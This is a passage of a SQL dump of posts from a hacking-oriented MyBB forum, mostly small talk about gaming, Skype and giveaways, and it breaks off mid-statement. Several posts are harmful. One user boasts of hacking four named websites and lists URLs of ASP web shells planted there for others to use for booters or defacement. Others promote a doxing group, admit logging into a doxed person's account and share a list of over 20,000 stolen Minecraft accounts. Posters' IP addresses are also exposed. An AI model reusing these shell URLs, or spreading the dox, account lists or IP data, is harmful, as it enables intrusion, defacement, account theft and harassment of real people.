`dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6248', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '1', 't3h jok3r', '1351048007', 'Thanks for the hide plugin. I will replace it very soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ae0b1d184cde09a12abd89d8656a5408', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6249', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '205', 'mothered', '1351051675', 'Same here, I experienced the same. It can be rather annoying, when trying to establish whether your post has been submitted.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6d76be5111a6ecd87f23bb5e4151f37a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6250', '1072', '6218', '24', 'RE: iPad Mini?', '0', '205', 'mothered', '1351051939', 'I don\'t like It at all. In fact, I don\'t like nearly all Apple products. Compatibility-wise, they\'re not suited to me.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e91d9d5977d648ce3ed3c353d8ebcc2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6251', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '205', 'mothered', '1351052119', 'So what\'s the contest all about, and what does It Involve?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '293c12aade1bb2200460dc334acd2f1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6252', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '205', 'mothered', '1351052222', 'As much as I love the song, In my views, I believe this Is a one-hit wonder, hence when this dies down, we\'ll never hear from the artist again.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd26ce4fc91b48653e5a668362d15721a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6253', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '257', 'XxTREYZxX', '1351056200', 'Thanks for these mate :O I will use them :P', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'f92b189a2f02921bf3f69aba3ff11117', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6254', '1078', '0', '7', 'Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1351056377', 'Be sure to check out Kasual\'s Dox over at NSA - NotSoAnonymo.us. We are building a very strong Doxing team and hopefully you guys can signup and join the community. http://www.notsoanonymo.us/index.php?/topic/47-kasual-spushkin1/ *Note - if you are nervous about being doxd please choose a username that nobody has ever used before! To eliminate that possibility Check us out here at http://notsoanonymo.us today!', '74.76.76.132', '1246514308', '1', '0', '222', '1351066232', '1', '2e89d1862d4a6d01798b2573278bb4d5', '0', '1351066232'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6255', '1058', '6090', '24', 'RE: Microsoft or Apple', '0', '257', 'XxTREYZxX', '1351060814', 'Microsoft all the way :o Its just better in every way. the only thing i like on the apple is the apple :o', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '06ad5fef411e3a240cc57b1ac2640f12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6256', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '228', 'VirtualLegend', '1351062028', 'Yeah I\'m Back :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '89a7ec197081fc3ef25b3dccc0f24e55', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6257', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '228', 'VirtualLegend', '1351062323', 'Nice This is the first giveaway involving food, I want to join :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '0bff8e3cf895efe7b36b6a8803a58fa3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6258', '1079', '0', '7', 'ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351064642', 'Hey LH, can all you guys here add me on Skype, thanks Guys. is there like a group on Skype for LH.', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'f2cac4301d96cdfcd55976d751fa5277', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6259', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '222', 'Exposé', '1351065295', 'I can add you to our LH group chat :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b2bc1287599c0633a75b1717a17f2ef7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6260', '1079', '6259', '7', 'RE: ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351065582', '[quote=\'Exposé\' pid=\'6259\' dateline=\'1351065295\'] I can add you to our LH group chat :D [/quote] Yes please thanks so much', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '9ab8116531e953520c3750438bedebb7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6261', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '222', 'Exposé', '1351065668', 'lol good thought we lost you lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '2f9e15da3735748233a9291ccdc75118', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6262', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '222', 'Exposé', '1351065722', 'Sent you a request you have to accept me first lol', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '526da7505a2b0b8d242e12507f2de95e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6263', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351065915', 'yeah i know i cant go on today though sorry :)', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '67461bff798650c13f08c88ed53e4cc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6264', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '222', 'Exposé', '1351066025', 'Oh lol ok...np just accept me whenever and ill add u to the chat :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '30d7c1cb94948e8f6d7e560e51d481da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6265', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351066183', 'Ok thanks man, i should be able to go on ToMorrow', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '54357752edbc513fc132ddc56b61b729', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6266', '1075', '6245', '9', 'RE: ? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '62', 'R?????zo?', '1351070086', 'thanks I will try this out.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b7fddbae35cabbf4118436987b626f90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6267', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '228', 'VirtualLegend', '1351089676', 'At school 5-6 Hours working/secretly gaming :P At Home 4-5 Making my school work that i didn\'t make because i game to much :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'df2a07524856bebc1bb98c0622329661', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6268', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '100', '??zg???g????61', '1351090692', 'Around three to four hours a day on the weekend', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '23a79b434330341f9194bb4706816f82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6269', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '258', 'PiXEL^OG', '1351091542', 'Half an hour daily , when this place gets more activity ill be on like 2 hours daily!!', '198.144.105.35', '-963614429', '0', '0', '0', '0', '1', 'f3f760cc890900d769ed59f445e76a9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6270', '1080', '0', '13', '[FREASH] 4 ASP shelled sites!!!![hacked]', '0', '258', 'PiXEL^OG', '1351091701', 'You guys can use these sites to upload your booter shells or just deface the sites. I hacked the site and uploaded some shells for you to use!! I only shelled 4 sites but that should be enough for us right? :) Here they are!!! : http://www.6408.com.cn/404.asp;.txt http://niceforyou.com.cn/404.asp;.txt http://events.ardmore.org/404.asp;.txt http://www.maqiduo.com/404.asp;.txt Anyways if you liked it then post your love down below , not then tell me why ya did not like it Enjoy!! :D', '198.144.105.35', '-963614429', '0', '0', '258', '1351093277', '1', '08823dfdfc056c30043b891127c1cc5e', '0', '1351093277'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6271', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '228', 'VirtualLegend', '1351096729', '[i][b]Username:[/b][/i] [color=#C71585]VirtualLegend[/color] [i][b]Name:[/b][/i] [color=#FF1493]Classified Information[/color] :p [i][b]Age:[/b][/i] [color=#9400D3]16[/color] [i][b]Profile:[/b][/i] [color=#FF69B4]http://l33thacking.net/user-228.html[/color] [i][b]PSN:[/b][/i] [color=#DDA0DD]LegendaryMoker[/color] [i][b]Why should you accept me?:[/b][/i] [color=#9400D3]The reason why I\'m applying to the Gamer Group is not because of the cool userbar, but I can say proudly that I\'m a hardcore gamer. I play lots of games often, and i finish every game entirely. My favorite type of game is war like the Call of Duty series. Thats why I want to be a part of the group, so that i can post more threads involving gaming. I want also to game with the with the members of the Gamers group[/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd151968101fa04a01e96ca8bc217512d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6272', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '228', 'VirtualLegend', '1351097060', 'Nice share Very handy to use Keep it up bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4a55cef747be6d4dc2e366322786ddd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6273', '1074', '6244', '84', 'RE: [NEW] App Trailers Exploit [HOT!]', '0', '228', 'VirtualLegend', '1351097190', 'Nice Share The Maker of this is f*cking smart', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a294e5a4668bbd75f42d7405ce9cf9bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6274', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '228', 'VirtualLegend', '1351097331', 'Nice tutorial did you made it? cuz it\'s Awesome', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd9dedb0e8927bdc1cb68b8bab51c59ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6275', '1075', '6245', '9', 'RE: ? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '61', 'NXK', '1351105973', 'Ill try it out now and Post some feedback. Not really a good guide, Most of this is pretty common information and don\'t \"actually\" get you a amazon gift card, They earn you points to get one which may take awhile.', '99.252.235.12', '1677519628', '1', '0', '61', '1351106109', '1', 'b14f16856a08f95371f9149e1a3dbb3a', '0', '1351106109'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6276', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '82', 'iTzIpod', '1351107524', 'Checked it out. Good job NSA! :) Why did you guys dox him though? He\'s a member of LH isn\'t he? Also, I checked his Adf.ly Account and the password was changed. Someone probably changed it due to his earnings or so. But I checked his Adfoc.us Account and it worked. But the earnings are meh. $0.00052 or something. Lol.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad436418c8607f9f4747e70c5c9ec7d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6277', '1060', '6248', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351107713', '[quote=\'t3h jok3r\' pid=\'6248\' dateline=\'1351048007\'] Thanks for the hide plugin. I will replace it very soon. [/quote] LeakForums had the plugin. That\'s how I knew about it :3 They just recently got it.', '24.212.197.164', '416597412', '1', '0', '82', '1351118341', '1', 'a6fa433509119f4e5e2a5f12c4f0815d', '0', '1351118341'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6278', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '82', 'iTzIpod', '1351107775', 'How will you do so though? What do you mean by \"Free chocolates and drinks\"?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '28b63dc4fa23dfe2e2674f912335d5a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6279', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '61', 'NXK', '1351107788', 'Pretty awesome, Thanks for for this.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f6dcf850d278e245689425e89e43194f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6280', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '82', 'iTzIpod', '1351107811', 'Add me. Skype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca1f9cb0a46adbaf4793c2bfb192e946', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6281', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '82', 'iTzIpod', '1351107900', 'Virtual or any Mod/SMod/Admin can junk & close this thread now.. Problem\'s solved. Only an Admin/Mod/SMod. @Trey you better not post saying \"Oh yeah I agree with iTzIpod that this thread should now be closed because the problem is solved.\" -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8618563b7ab5777a98441c255ff8c9f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6282', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '82', 'iTzIpod', '1351107969', 'Virus Scan? Anything? :o Other than that, thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5bb5f219e596facda5a98527760aeb95', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6283', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '228', 'VirtualLegend', '1351108475', 'I have add you treyz', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1b41c17d54365c96f5cacaaba5f95821', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6284', '1081', '0', '43', 'Minecraft Accounts!! Over 20,000!', '0', '160', 'Jacob', '1351109254', 'Get your Minecraft accounts here! Took it off a different forum http://pastebin.com/uLC0UTGe All premium :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '92ea5489993e3c4abfb8802b06ccc64e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6285', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '160', 'Jacob', '1351109621', 'No, just browsing around, and yeah I will try to be active here :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '7e6d004e88879a2b37c4cf02df64503f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6286', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '228', 'VirtualLegend', '1351110916', 'GamerTag - N/A PSN - LegendaryMoker Steam - N/A Skype - VirtualLegend', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '51c67303fc1b89752223c18a384f1dae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6287', '1082', '0', '74', 'WarZ', '0', '61', 'NXK', '1351111804', 'Anyone play? I switched from DayZ for this game and I love it atm. If you play let me know we can play :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '7b164d70db598ec2a22fb839d8596189', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6288', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '2', 'Apathy', '1351112339', 'Downloading this Thanks for the share.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '6d1fade7c173d023aeec53394174b2dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6289', '1060', '6277', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351112771', '[quote=\'iTzIpod\' pid=\'6277\' dateline=\'1351107713\'] [quote=\'t3h jok3r\' pid=\'6248\' dateline=\'1351048007\'] Thanks for the hide plugin. I will replace it very soon. [/quote] LH had the plugin. That\'s how I knew about it :3 They just recently got it. [/quote] you mean LF and not LH?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1eeb2a3031726fdf0aedb1f1b3eee461', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6290', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '62', 'R?????zo?', '1351112848', 'Bookmarked, I will try this. I think I\'m infected tbh :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '118b027ca1560e975262ed4426385d84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6291', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '62', 'R?????zo?', '1351112882', 'Thanks for this, looks awesome, I will give it a try.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3a21c096d01cddce126c33d2774fd061', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6292', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '62', 'R?????zo?', '1351113015', 'pretty much all day at work, and sometime when I get home. that\'s like 12hours a day.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f5d2668587388f19337af051f0db895e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6293', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1351113091', 'yeah welcome to the group <3 I shall post some new content.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e44a872368e2ccd7ed5fc03c466c8999', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6294', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '82', 'iTzIpod', '1351118230', 'Lol I swear 70% of the accounts there are taken. I know which forum you got the accounts from. And that forum has it\'s own Minecraft Account Checker. And a lot of users have it. So they probably took most of the accounts on here.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3507347c8ac7cf19af288c31fe94aaf7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6295', '1082', '6287', '74', 'RE: WarZ', '0', '82', 'iTzIpod', '1351118271', 'Pssh. I play MineZ on Minecraft. (It\'s a server) :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1af47f45a8ca6f19a9350f4e052dc077', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6296', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351118366', 'It auto corrects L/F to LH. I meant to say LeakForums.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4a0e127825ce30b9bac46c790ae2af6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, 